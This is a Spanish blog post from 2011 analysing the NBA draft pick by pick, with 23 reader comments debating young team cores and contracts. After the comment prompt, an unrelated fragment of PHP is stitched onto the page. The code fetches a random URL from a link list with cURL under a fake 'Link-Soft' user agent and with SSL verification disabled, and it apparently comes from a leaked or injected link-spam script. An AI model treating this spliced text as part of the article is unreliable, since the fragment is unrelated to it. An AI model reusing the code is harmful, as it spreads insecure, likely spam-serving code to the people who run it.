Kyrie Irving, escogido número 1 del draft

24 de June de 2011 por txusma

Era un secreto a voces pero el hecho de que los Cavs no hubieran anunciado extraoficialmente que Kyrie Irving sería su primera elección había dotado de cierta incertidumbre al primer nombre del draft. Finalmente no saltó la sorpresa y el ex jugador de Duke será el encargado de hacer olvidar a Lebron James. Madera parece que tiene.

Por su parte, los Wolves no realizaron ninguno de los espectaculares trades que sonaban en los últimos días y acabaron escogiendo a Derrick Williams lo que deja un panorama muy abierto de cara al futuro. Hay que decir que algunos directivos de Minnesota apostaban por el turco Kanter que, posicionalmente, se ajustaba más a las necesidades de la plantilla.

Precisamente Enes Kanter fue la elección de los Jazz en el número 3. Okur, Millsap, Jefferson, Favors y Kanter conforman un juego interior demasiado concurrido por lo que no es nada descartable nuevos traspasos. Complementaron el draft con Alec Burks en la docena elección, un escolta que, si mejor su tiro, puede llegar a ser toda una estrella. Hayward, Favors, Kanter y Burks forman un núcleo joven más que interesante para Utah.

Con estas 3 elecciones, llegaba libre a la 4ª elección, propiedad de nuevo de Cleveland, Brandon Knight por lo que, tras la elección de Tristan Thompson, rápidamente saltó el debate: ¿Qué es mejor, el combo Irving-Thompson o el Williams-Knight? Irving es, sin duda, el mejor jugador del draft pero Williams se ajustaba como un guante a la plantilla de los Cavs y además en la 4ª hubieran escogido a otro gran base como Brandon Knight. ¿Se arrepentirán algún día?

Los Raptors tenían pensado escoger a Bismack Biyombo pero se encontraron con que Jonas Valanciunas llegaba libre y no desaprovecharon la oportunidad. Los canadienses asumen un gran riesgo porque aunque no hay dudas del potencial del lituano no se sabe cuando podrá jugar en la NBA.

La sexta elección estaba cantada desde hace días. Los Wizards escogieron a Jan Vesely, un auténtico atleta que se ajusta como anillo al dedo con John Wall y Javale McGee. Además en la elección 19 se hicieron con Chris Singleton, el mejor defensor de este draft que cayó más de lo previsto, y en 2ª ronda escogieron a uno de los héroes de la March Madness de este año, el base Shelvin Mack. Sin duda, los capitalinos fueron unos de los vencedores del draft.

La séptima elección fue para Bobcats después de cerrar un traspaso a 3 bandas con Kings y Bucks. Charlotte recibió a Corey Maggette y Bismack Biyombo, escogido en esa séptima elección. Los Bucks consiguieron a Stephen Jackson, Beno Udrih, Shaun Livingstone y la elección 19, y los Kings a John Salmons y la elección 10. El congoleño ha llegado de ninguna parte hasta el TOP-10 del draft al asegurar defensa, rebotes y tapones. Un potencial Ben Wallace. Los Bobcats mantuvieron la 9ª elección con la que se hicieron con la estrella de UConn y MVP de la March Madness, Kemba Walker. Walker es un ganador nato, un auténtico líder de la pista, algo de lo que adolece Charlotte una franquicia que deja a todos indiferentes. 2 buenas adquisiciones desde mi punto de vista.

La octava elección era para los Pistons que, aunque buscaban un hombre alto que acompañara a Monroe en la pintura, no pudieron dejar caer más al 2º mejor base del draft, Brandon Knight. El combo Knight-Monroe me parece de calidad superior y moviendo a Stuckey a la posición de escolta queda un núcleo muy interesante de cara al futuro. En 2ª ronda se hicieron con otro de los nombres propios de la NCAA, Kyle Singler.

La décima elección era de los Kings gracias al trade que hemos explicado antes y estaba cantada. Con Knight y Walker escogidos no había dudas: el hombre era Jimmer Fredette. Lo preocupante es que la elección es de la directiva, no de los entrenadores que preferían un base veterano. De todas maneras, Fredette ha subido en los mocks gracias a los buenos workouts que ha realizado. Su habilidad en el tiro está más que demostrada y puede llegar a ser mucho mejor que el esloveno. En 2ª ronda, los Kings han escogido al ex jugador de UCLA, Tyler Honeycutt, uno de mis preferidos. Gran inteligencia, buen pasador y muchos intangibles. Un currante en toda regla.

En la undécima elección los Warriors se han hecho con los servicios de Klay Thompson, que enamoró a Jerry West en los workouts previos. La elección de un escolta pone más en evidencia las ganas que tienen de traspasar a Monta Ellis. De todas manera, Ellis es mucho mejor de lo que nunca llegará a ser Thompson, y no creo que sean incompatibles.

Las elecciones 13 y 14 fueron para los gemelos Morris. Los Suns escogieron a Moncrieff y los Rockets a Marcus, cuando todo hacía indicar que Marcus era el gemelo bueno. Sorprende la elección de Houston teniendo en cuenta que un alero como Kawhi Leonard continuaba libre y la cantidad de ala-pívots con los que cuentan. Además, posteriormente se hicieron con Donatas Motiejunas (otro PF) en un traspaso en el que también recibieron a Jonny Flynn. Enviaron a cambio a Brad Miller a Minnesota.

Indiana tenía pensado draftear a uno de los gemelos Morris para ayudar en el rebote pero se encontraron con Kawhi Leonard al que no dudaron en draftear. Sin embargo, los Pacers disponen ya de mucho talento joven y ha llegado el momento de poner la carne en el asador así que traspasaron a Leonard a los Spurs a cambio de George Hill. Gran traspaso para ambos. Leonard cubre un hueco importante de la plantilla de los Spurs y estos traspasan a Hill sabiendo que no podrán retenerlo por poco dinero en un par de temporadas. El ya ex-escolta de los Spurs, gran defensor y con capacidad para generar sus propios tiros. Será el escolta titular de los Pacers. Me encanta el trabajo de RC Buford año tras año.

Completando la información referida al draft, Portland y Denver intercambiaron bases (Miller y Felton, respectivamente) en un traspaso en el que también estuvieron implicados los Mavs, que se quedaron con el español Rudy Fernandez. Cualquier cambio de aires es bueno pero con Barea, Stevenson y Butler como agentes libres, no es descabellado que Rudy goce de buenos minutos en Dallas.

Comenta

23 comentarios a esta entrada

  1. Cocinitas dice:
    #1

    Me parecen buenas elecciones las de Utah, Wizards y Bobcats. Parece que por fin alguien tiene las cosas claras en el equipo de Jordan. No me gustaron mucho los movimientos de los Timberwolves, cortarán a Miller?? Y traspasarán a Beasley, a cambio de que? Se supone que un buen escolta pero quien, me hubiera gustado que se hubieran hecho con Stephen Jackson. Monta Ellis???? Rip hamilton????

      Citar

  2. carlos dice:
    #2

    En definitiva, cual os parece el pack de jóvenes más interesantes?

    a) wall + vesely + crawford
    b) irving + thompson
    c) knight + monroe
    d) favors + kanter + hayward + burks
    e) walker + biyombo
    f) fredette + evans + cousins

      Citar

  3. Txusma dice:
    #3

    g) rubio + williams + johnson
    h) griffin + bledsoe + aminu

    Hay muchos equipos con núcleos jóvenes muy bien definidos. A mi ese Monroe + knight me gusta y además lo han conseguido con dos elecciones fueran del TOP-5. Walker + Biyombo me deja más frío.

      Citar

  4. Len Bias dice:
    #4

    Wall-Crawford-Vesely-Blatche-McGee, además de Singleton, Nick Young y Shelvin Mack… sigo pensando que este equipo tiene un futuro increíble si progresan como parece

      Citar

  5. alejandro dice:
    #5

    minnesota tiene un equipo de futuro bastante a tener en cuenta los wizards tambien me parece ke han elegido muy bien ojo con vesely que es un crack,pero me quedo con walker y biyombo creo que van a dar mucho de que hablar este año

      Citar

  6. kantonyo dice:
    #6

    Creo que Derrick Williams es el mejor jugador de este draft de largo. Es un gran acierto por parte de Minnesota. Y creo que Cleveland se ha equivocado, no veo a Irving preparado para aguantar la responsabilidad de hacer olvidar el legado de LeBron, era mucho más adecuado un jugador del caracter de Williams.

      Citar

  7. Esteban dice:
    #7

    carlos te olvidas de thorton cuando das a sacramento, que promedio 20 pp y es su segundo año

    el mas interesante me parece el de washignton, por wall, principalmente, y por q para el 2013 no estan garantizados los 20 millones de lewis y podran ir por algo grande con un buen nucleo y una mega estralla en su lugar

      Citar

  8. safd dice:
    #8

    Para mi el nucleo joven mas interesante es Westbrook-Harden-Durant-Ibaka 🙂

      Citar

  9. Esteban dice:
    #9

    jajaja sarf, eso ya no es un nucleo, es una bomba nuclear!!!!!!!1

      Citar

  10. Denise dice:
    #10

    Ojo al equipo que en 2-3 años se pueden montar en Washington, tienen un montón de jugadores jóvenes prometedores, especialmente Wall y McGee (si soy muy pesado, pero me encanta McGee), y el año que vienen por fin liberan los 23 kilos de Lewis.
    También los Wolves tienen muchos jóvenes aunque Wesley Johnson y Ricky no terminan de convencerme.
    Me alegro por Biyombo, numero 7 del draft, y un bicharraco a seguir en el futuro.

      Citar

  11. HisRoyalAirness dice:
    #11

    Es cosa mía o cada día hay más “enanos” jugando de ala-pivot/power forward? Williams o Biyombo son tipos de 2’05 pelao y dicen jugar en esa posición…es decir, un buen físico puede ayudarte a rebotear y a encarar bien el poste si tienes técnica pero es que luego hay que cubrir a Pau, Tim, Dirk, KG, Bosh, Lamarcus y les hacen un traje terrible. En eliminatorias este tipo de jugadores hacen aguas por todos lados (a no ser que tengan un rango de tiro amplio, que no es el caso).

    A mí el núcleo de los Wizards no me convence nada. Wall me parece un tipo con cualidades pero me pone enfermo ese ego de estrellita que se trae, al margen de que la gente lleva criticando el tiro de Ricky todo el año y este tío tira igual o peor. McGee me parece un tipo bastante del montòn y los demás ni fu ni fa…
    Tienen mucho mejor pinta los núcleos de Clippers o T-Wolves, me apetece mucho verlos en acción.

    Y quiero ver a Kemba y Fredette tirando desde su casa, creo que van a tener mayor impacto del que se les supone

      Citar

  12. Rompe dice:
    #12

    Casi me quedo con el núcleo de los Clippers, con Bledsoe, Gordon, Aminu y Griffin… Y este último sí que es una megaestrella desde ya, que puede atraer a otras. Lo único malo es el equipo, que siempre será el hermano pobre…

      Citar

  13. max dice:
    #13

    Interesante también el movimiento de Milwaukee, que se hacen con Stephen Jackson, S.Livingstone y Beno Udrih y se deshacen de los contratos de Maggette y Salmons, aún a costa de ceder el pick 9 a Charlotte. Veremos, pero a priori parece que mejoran…..

      Citar

  14. Esteban dice:
    #14

    los clippers puede sewr, no tanto popr lo jovenes sino porq ya tienen un equipo con jugadores de edad

    me mandaranal diablo, pero griffin debera mejorar enormemente esa temporada si pretende ser una mega estrella, todos sus puntos son de pase y volcada o alley up

    no tiene tiro exterior, ni buien juego de posteo, ni opanonunder, ni gancho, es muy limitado
    me hace acordar a carter, una lesion q le haga saltar algo menos y sera un jugaodr del monton, dependera de el
    aunque los clippers si tiene un gran equipo

    mo-biedsoe
    eric gordon-foye
    princie¿?-aminu
    griffin-smith
    jordan-kaman

    sobretodo por q caman pùede jugar en las dos posciciones, y sera una especie de rotacion de 3 internos tipo los lakers, o los pintons, on los wallace y mcdyes
    si prince acepte 5 millones por año, este es el equipo de los clippers

      Citar

  15. Esteban dice:
    #15

    max si para deshacerse de los contratos de salmons y maggette, hay que comerse el de udrih madre mia
    los dos cobraban una fortuna y su nivel era menor a lo que se esperaba, perto aun asi veian minutos y jugaban, udrih se lleva mas 7 kilos, por dos o tres temporadas mas no recuerdo y nisiquiera entrara en la rotacion habitual

      Citar

  16. max dice:
    #16

    Esteban, prefiero a un Stephen Jackson al nivel de Charlotte + Udrih al nivel de Kings que mantener en el roster a Salmons + Maggette con sus contratos y su poco rendimiento, sobretodo Maggette.

      Citar

  17. HisRoyalAirness dice:
    #17

    Esteban, no estoy de acuerdo con las cosas que dices de Griffin.
    Tiro exterior? No tiene una mala mecánica y eso siempre es mejorable (véase Duncan y su épico-infalible tiro a tabla).
    Juego de poste? Juega bien al poste, si acaso tiene poca variedad de movimientos pero normalmente tiene ventaja por agilidad y hace muy bien y muy rápido el reverso. Un par de movimientos más y listo, hablamos de alguien con técnica, no de un tronco que no pueda aprender cosas nuevas.
    El gancho sí que lo deja bastante bien, ahí creo que te estás pasando de exigente.

    Tiene que mejorar pero lo que, en mi opinión, es verdaderamente urgente es su defensa en el poste bajo y su porcentaje de tiros libros. Y yo si fuera su entrenador y con esa capacidad de salto le exigiría un mínimo de tapón por partido

      Citar

  18. Cocinitas dice:
    #18

    Los Clippers con un buen alero tipo Prince son candidatos a Playoffs en el Oeste este año. Claro que Griffin debe pulir sus movimientos pero que no creas que es y será una superestrella me parece inaudito solo tienes que ver el impacto que ha supuesto en su equipo esta temporada. Una gran opcion seria un trade con Timberwolves Kaman x Beasley y algun jugador mas para hacerlo viable.

      Citar

  19. Denise dice:
    #19

    Por cierto, no es por ser aguafiestas, pero el panorama que se le presenta a Dallas es un poco feo. Si los datos del cuadro de salario de hoopshype son correctos, tanto Chandler, Barea, Stevenson y Butler acaban contrato, y ya tienen 63 millones garantizados en nómina. Y excepto Stevenson, ninguno de los otros 3 creo que quieran renovar por la mid-level.

      Citar

  20. German dice:
    #20

    Alguien podria facilitarme alguna pagina donde esten los valores y duracion de los contratos? Desde ya muchisimas gracias!

      Citar

  21. Txusma dice:
    #21

    http://www.hoopshype.com, sección ‘salaries’

      Citar

  22. Txusma dice:
    #22

    Denise, creo q a la hora de renovar no importa que estés por encima del límite. No me hagas mucho caso, pero creo que las excepciones Bird, Early-Bird y Non-Bird te permiten hacer esas cosas. Hay consderaciones sobre el salario, eso sí.

      Citar

  23. Esteban dice:
    #23

    debe ser que me ha tocado ver partidos de muchos puntos de griffin pero todos parecidos

    cuando digo MEGAESTRELLA estoy hablando de un jugador que en partidos cerrados pueda tomar un tiro y meterlo
    como lo haria griffin? no tira a 4 metros, no lo vi nunca hacerlo, le han salido jugadas de giro solo por q vuela,
    tamb debo decir Q NO MIDE 2.08MTRS!!!!!!!!!!!!!!!!!! lo vi contra los celtics y glen davis es mas alto, y este no es justamente algo

    puede rebotear y anotar mucho recibniendo asistencias, pero me pinta mas a un CARLOS BOOZER, AL JEFERSON que a un TIM DUNCAN o GARNET

    eso dependera de cuando progrese este año, y repito lo q dije de su fisico, el dia q deje de acompañarlo en semejante plenitud no lo veo como un gran jugador si no tiene esa potencia y ese salto

    yo no largia nunca a KAMAN, con ese trio de internos tienen posibilidades ilimatadas, aunque KAMAN acaba contrato este año, y quiza no puedan retenerlo el seguiente

    no hay grandes agentes libres aleros, y los que los hay preferiran otro equipo con aspiraciones mas seguras, pero si convencen a kirilenko o prince por esos casi 6 millones q tienen en el tope, pueden dar que hablar

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>